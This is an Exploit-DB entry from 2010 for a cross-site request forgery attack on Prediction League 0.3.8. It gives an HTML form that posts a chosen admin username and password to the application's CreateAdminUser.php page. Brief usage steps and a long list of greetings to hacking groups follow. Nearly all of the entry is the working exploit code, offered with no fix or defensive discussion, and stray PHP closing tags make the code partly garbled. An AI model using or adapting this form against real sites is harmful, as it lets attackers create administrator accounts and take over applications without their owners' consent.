Prediction League 0.3.8 - CSRF Create Admin User Exploit

2010-04-04T00:00:00
ID EDB-ID:12043
Type exploitdb
Reporter indoushka
Modified 2010-04-04T00:00:00

Description

Prediction League 0.3.8 CSRF Create Admin User Exploit. Webapps exploit for php platform

                                        
                                            ========================================================================================                  
| # Title    : Prediction League 0.3.8 CSRF Create Admin User Exploit            
| # Author   : indoushka                                                                                                              
| # Home     : www.iqs3cur1ty.com/vb                                                                                                                                                                                                             
| # Tested on: Lunix Franรงais v.(9.4 Ubuntu)       
| # Bug      : CSRF Create Admin User Exploit                                                                     
======================      Exploit By indoushka       =================================
 # Exploit  : 
 
  <form method="POST" action="http://127.0.0.1/PredictionLeague/CreateAdminUser.php">
    <table>
      <tr>
        <td class="TBLHEAD" colspan="3" align="CENTER">
          <font class="TBLHEAD">
            Admin User Administration
          </font>
        </td>
      </tr>
      <tr>
        <td class="TBLROW">
          <font class="TBLROW">
            Admin User Name
          </font>
        </td>
        <td class="TBLROW">
          <font class="TBLROW">
            <input type="TEXT" size="20" name="USER" value="">
          </font>
        </td>
        <td class="TBLROW">
          <font class="TBLROW">
            The name for the admin user.
          </font>
        </td>
      </tr> 
      <tr>
        <td class="TBLROW">
          <font class="TBLROW">
            Password
          </font>
        </td>
        <td class="TBLROW">
          <font class="TBLROW">
            <input type="TEXT" size="20" name="PASSWORD">
          </font>
        </td>
        <td class="TBLROW">
          <font class="TBLROW">
            The password for the admin user.
          </font>
        </td>
      </tr> 
      <tr>
        <td colspan="3" class="TBLROW" align="CENTER">
          <input type="SUBMIT" NAME="CREATE" VALUE="CREATE">
        </td>
      </tr>
    </table>
  </form>
<?php
  }
?>

  </body>
</html>

                  
2 - Save As .html

3 - Login                 
 
Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ========================
Greetz : 
Exploit-db Team : 
(loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
www.owned-m.com * Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/
www.securityreason.com * www.m-y.cc * Cyb3r IntRue (avengers team) * www.alkrsan.net * www.mormoroth.net
--------------------------------------------------------------------------------------------------------------